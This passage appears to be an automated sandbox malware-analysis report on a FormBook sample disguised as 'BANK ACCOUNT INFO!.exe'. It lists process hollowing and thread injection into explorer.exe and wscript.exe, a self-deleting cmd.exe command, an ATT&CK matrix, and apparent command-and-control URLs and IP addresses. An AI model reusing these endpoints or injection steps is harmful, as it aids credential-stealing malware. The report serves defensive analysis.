Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B32D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B32D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B32D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B32D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B32D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B32D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B32D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B28DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A8D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A8D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B3FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B3FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B3FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B3FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AF6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AF6DC9 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wscript.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 35.230.2.159 80
Source: C:\Windows\explorer.exe	Network Connect: 198.49.23.141 80
Source: C:\Windows\explorer.exe	Network Connect: 107.22.223.163 80

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Thread register set: target process: 3388
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 3388

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 8B0000

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Process created: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe'

Source: explorer.exe, 00000002.00000000.216648547.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000002.00000002.475812841.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.475893028.0000000003300000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000002.475812841.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.475893028.0000000003300000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000002.475812841.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.475893028.0000000003300000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.475812841.0000000001980000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.475893028.0000000003300000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Queries volume information: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe VolumeInformation
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation

Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.475693377.0000000002EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.258154608.0000000001000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.475792839.0000000002F20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473464239.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.257924121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.258303947.0000000001420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.214389513.00000000038B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BANK ACCOUNT INFO!.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Rootkit1	Credential API Hooking1	Security Software Discovery221	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Masquerading1	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection512	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing3	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
BANK ACCOUNT INFO!.exe	21%	Virustotal	Browse
BANK ACCOUNT INFO!.exe	10%	ReversingLabs
BANK ACCOUNT INFO!.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.BANK ACCOUNT INFO!.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.katrinarask.com/sbmh/	0%	Avira URL Cloud	safe
http://www.elegancerealestategroup.com/sbmh/	0%	Avira URL Cloud	safe
http://www.makgxoimisitzer.info/sbmh/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.firedoom.com	0%	Avira URL Cloud	safe
http://www.katrinarask.com/sbmh/www.wellnysdirect.com	0%	Avira URL Cloud	safe
http://www.makgxoimisitzer.info	0%	Avira URL Cloud	safe
http://www.meatslasvegas.comReferer:	0%	Avira URL Cloud	safe
http://www.parking500.com/sbmh/www.faculdadegraca.com	0%	Avira URL Cloud	safe
http://www.magentos6.com/sbmh/www.elegancerealestategroup.com	0%	Avira URL Cloud	safe
http://www.friendlyksa.com/sbmh/	0%	Avira URL Cloud	safe
http://www.magentos6.com/sbmh/	0%	Avira URL Cloud	safe
http://www.faculdadegraca.com/sbmh/	0%	Avira URL Cloud	safe
http://www.parking500.comReferer:	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.firedoom.com/sbmh/	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.meatslasvegas.com/sbmh/	100%	Avira URL Cloud	malware
http://www.wellnysdirect.com/sbmh/	0%	Avira URL Cloud	safe
http://www.endlessgirls.online/sbmh/www.makgxoimisitzer.info	0%	Avira URL Cloud	safe
http://www.downrangedynamics.comReferer:	0%	Avira URL Cloud	safe
http://www.ablehead.netReferer:	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.katrinarask.com	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
https://www.wellnysdirect.com/sbmh/?FPWlMXx=	0%	Avira URL Cloud	safe
http://www.endlessgirls.online	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.downrangedynamics.com	0%	Avira URL Cloud	safe
http://www.ablehead.net/sbmh/	0%	Avira URL Cloud	safe
http://www.endlessgirls.onlineReferer:	0%	Avira URL Cloud	safe
http://www.katrinarask.com/sbmh/?FPWlMXx=W647QVGGXcyuIQJd2YRsV4l3KrBdlR6nE0kWwxhnTOMt1o1EWv0jVtfUgI2cf5E+EjKE&AlO=O2JtmTIX2	0%	Avira URL Cloud	safe
http://www.endlessgirls.online/sbmh/	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.faculdadegraca.com	0%	Avira URL Cloud	safe
http://www.downrangedynamics.com/sbmh/	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.elegancerealestategroup.comReferer:	0%	Avira URL Cloud	safe
http://www.salon-massage-linit.comReferer:	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.elegancerealestategroup.com	0%	Avira URL Cloud	safe
http://crl.micr	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.salon-massage-linit.com/sbmh/N	0%	Avira URL Cloud	safe
http://www.hoy.viajes/sbmh/www.firedoom.com	0%	Avira URL Cloud	safe
http://www.salon-massage-linit.com	0%	Avira URL Cloud	safe
http://www.downrangedynamics.com/sbmh/www.meatslasvegas.com	0%	Avira URL Cloud	safe
http://www.parking500.com/sbmh/	0%	Avira URL Cloud	safe
http://www.wellnysdirect.com/sbmh/?FPWlMXx=+2tIfJwwghXNm+fysv8+EMC6xMyDXIpTEsDIQwPK5FpH6PGBMSGX6HHqgPLM/DeZI3NR&AlO=O2JtmTIX2	0%	Avira URL Cloud	safe
http://www.magentos6.comReferer:	0%	Avira URL Cloud	safe
http://www.katrinarask.comReferer:	0%	Avira URL Cloud	safe
http://www.hoy.viajesReferer:	0%	Avira URL Cloud	safe
http://www.ablehead.net	0%	Avira URL Cloud	safe
http://www.hoy.viajes/sbmh/	0%	Avira URL Cloud	safe
http://www.elegancerealestategroup.com/sbmh/www.hoy.viajes	0%	Avira URL Cloud	safe
http://www.meatslasvegas.com/sbmh/www.salon-massage-linit.com	100%	Avira URL Cloud	malware
http://www.firedoom.comReferer:	0%	Avira URL Cloud	safe
http://www.magentos6.com	0%	Avira URL Cloud	safe
http://www.parking500.com	0%	Avira URL Cloud	safe
http://www.ablehead.net/sbmh/www.katrinarask.com	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.friendlyksa.com	0%	Avira URL Cloud	safe
http://www.makgxoimisitzer.info/sbmh/www.downrangedynamics.com	0%	Avira URL Cloud	safe
http://crl.m	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.ablehead.net	107.22.223.163	true	true	unknown
ext-sq.squarespace.com	198.49.23.141	true	false	high
welllnysdirect.wpengine.com	35.230.2.159	true	false	high
www.friendlyksa.com	unknown	unknown	true	unknown
www.wellnysdirect.com	unknown	unknown	true	unknown
www.katrinarask.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.katrinarask.com/sbmh/?FPWlMXx=W647QVGGXcyuIQJd2YRsV4l3KrBdlR6nE0kWwxhnTOMt1o1EWv0jVtfUgI2cf5E+EjKE&AlO=O2JtmTIX2	true	Avira URL Cloud: safe	unknown
http://www.wellnysdirect.com/sbmh/?FPWlMXx=+2tIfJwwghXNm+fysv8+EMC6xMyDXIpTEsDIQwPK5FpH6PGBMSGX6HHqgPLM/DeZI3NR&AlO=O2JtmTIX2	true	Avira URL Cloud: safe	unknown
http://www.ablehead.net/sbmh/?FPWlMXx=PcjUtjh0MRWP8BRvWG8NuUt69AEkHHHW5P4XnB/f7cjpZcBvzWU1+UolGZvfCul1Hwqj&AlO=O2JtmTIX2	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.katrinarask.com/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elegancerealestategroup.com/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.makgxoimisitzer.info/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.firedoom.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.katrinarask.com/sbmh/www.wellnysdirect.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.makgxoimisitzer.info	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.meatslasvegas.comReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.parking500.com/sbmh/www.faculdadegraca.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.magentos6.com/sbmh/www.elegancerealestategroup.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.friendlyksa.com/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.magentos6.com/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.faculdadegraca.com/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.parking500.comReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.firedoom.com/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.meatslasvegas.com/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.wellnysdirect.com/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.endlessgirls.online/sbmh/www.makgxoimisitzer.info	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.downrangedynamics.comReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ablehead.netReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.katrinarask.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.wellnysdirect.com/sbmh/?FPWlMXx=	wscript.exe, 00000004.00000002.479367974.000000000546F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.endlessgirls.online	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.downrangedynamics.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ablehead.net/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.endlessgirls.onlineReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.endlessgirls.online/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.faculdadegraca.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.downrangedynamics.com/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.elegancerealestategroup.comReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.salon-massage-linit.comReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.elegancerealestategroup.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micr	explorer.exe, 00000002.00000000.229795137.0000000008907000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	BANK ACCOUNT INFO!.exe, 00000000.00000002.213965097.00000000028B1000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.salon-massage-linit.com/sbmh/N	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hoy.viajes/sbmh/www.firedoom.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.salon-massage-linit.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.downrangedynamics.com/sbmh/www.meatslasvegas.com	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com	explorer.exe, 00000002.00000000.229950600.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.parking500.com/sbmh/	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.magentos6.comReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.katrinarask.comReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hoy.viajesReferer:	explorer.exe, 00000002.00000003.295296507.00000000089CA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
